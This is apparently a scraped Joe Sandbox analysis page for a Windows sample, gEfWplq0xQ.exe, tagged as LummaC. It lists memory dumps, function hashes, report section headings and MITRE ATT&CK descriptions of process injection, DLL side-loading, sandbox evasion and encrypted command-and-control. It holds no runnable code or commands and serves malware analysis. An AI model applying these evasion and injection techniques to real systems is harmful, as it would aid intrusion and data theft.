Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d625c65106fedc4c64a6ddd093d6723f42647e097418eb778bd414df0d2252d
Instruction ID: b14293ae11bd706f86deb4c34dc90d108382279dc322af6061ff2609e5cfeda7
Opcode Fuzzy Hash: 3d625c65106fedc4c64a6ddd093d6723f42647e097418eb778bd414df0d2252d
Instruction Fuzzy Hash: CE21E731A483500BDB18CF39889113FFFE29BDB224F19DA3DD4A697295CA34ED068B45

Function 006DA282 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf05dfd08651374ad319bf971553ee66c0433ca07c9416549dc86bb363c819f
Instruction ID: 3fb63f1d8e5810bbf93991323bb4ad16f1131d25f9e682e7c18bfe8703c274c1
Opcode Fuzzy Hash: ebf05dfd08651374ad319bf971553ee66c0433ca07c9416549dc86bb363c819f
Instruction Fuzzy Hash: 61214FB3F5122147F3544834DC9439265839BD5311F2B82398F5D6BBC5DC7E5D8A5284

Function 006780C0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88602151052266dff5d2659a23f824d8e27f33ee712a12a8c5147fe921cf3298
Instruction ID: 5d13cd9b32534bafab217945c9040d49dd27f0fa2a1cb6a80bd012ecf1b6e203
Opcode Fuzzy Hash: 88602151052266dff5d2659a23f824d8e27f33ee712a12a8c5147fe921cf3298
Instruction Fuzzy Hash: E82158E3F116214BF3480829CD293222583E7D4325F2B82398F6EA77C5DCBE5C460288

Function 005E0228 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff11d5839ce29dd5ef16521f9b002514000e1f9b465eb9f187ea55d03982ea18
Instruction ID: 87af5737eaf7c9c81d9f333384d3aeedc3d4cb3ce6820a771286952836fd8aa8
Opcode Fuzzy Hash: ff11d5839ce29dd5ef16521f9b002514000e1f9b465eb9f187ea55d03982ea18
Instruction Fuzzy Hash: 3A218CB3F2262543F7585839CC693B66183ABD5311F2F827D8B4A977C4ECBD494A4284

Function 006A1084 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b431211fad54ffdb2313a2aec870ebd82b696fb9c011aef3c97e15cb33f463e1
Instruction ID: a94dfb1d14280618e1e21c31a0813eef61d57b90d320c5289f1eca0196e85e3c
Opcode Fuzzy Hash: b431211fad54ffdb2313a2aec870ebd82b696fb9c011aef3c97e15cb33f463e1
Instruction Fuzzy Hash: C0216AF3F506218BF3680878CA693B22543DB94324F2F42394F8A6B6C5DC7E48092284

Function 005FD063 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23dd1529551c80730c70b3c204e6d081f57de1438b7275a269f425e66f055007
Instruction ID: ccbded5d6e48e8e7533003b28c4b2bc555aacb6db4c0ea14fcdeab5007754521
Opcode Fuzzy Hash: 23dd1529551c80730c70b3c204e6d081f57de1438b7275a269f425e66f055007
Instruction Fuzzy Hash: 6721B6B3F6132587F3504D25CC943A27283DBE1314F2F80798A489BBC9D97EAD469784

Function 005A5450 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 1372e518470a56d98464f6b2efd3644109c49894d37f34c26a8adf9eda435dc3
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: C611EC336055D44EC7158D3C84009697F932AA7235B6943D9F4B89B1D2E5228DCA8364

Function 00593086 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eeab22c343a0a29300322077d93eaaa355dba61e36e446f269eed063860f934
Instruction ID: d9a3859d832345704ffebe519aa8a4e30eb42a0efa27fe49f3e960c7105d5c36
Opcode Fuzzy Hash: 2eeab22c343a0a29300322077d93eaaa355dba61e36e446f269eed063860f934
Instruction Fuzzy Hash: BCE0ED75C12205AFDE807B14FC1162CBE72B7B6307B462160E41963232EF31A82AEF65

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gEfWplq0xQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
gEfWplq0xQ.exe

Function 00578850 Relevance: 1.7, APIs: 1, Instructions: 208
COMMON

Function 005AC1F0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 005AC767 Relevance: 1.3, Strings: 1, Instructions: 99
COMMON

Function 0057B70C Relevance: 1.3, Strings: 1, Instructions: 61
COMMON

Function 0057C550 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Function 0057C583 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Function 005AAAA0 Relevance: 1.5, APIs: 1, Instructions: 13
memoryCOMMON

Function 005AAA80 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Function 005C87B5 Relevance: 1.3, APIs: 1, Instructions: 29
memoryCOMMON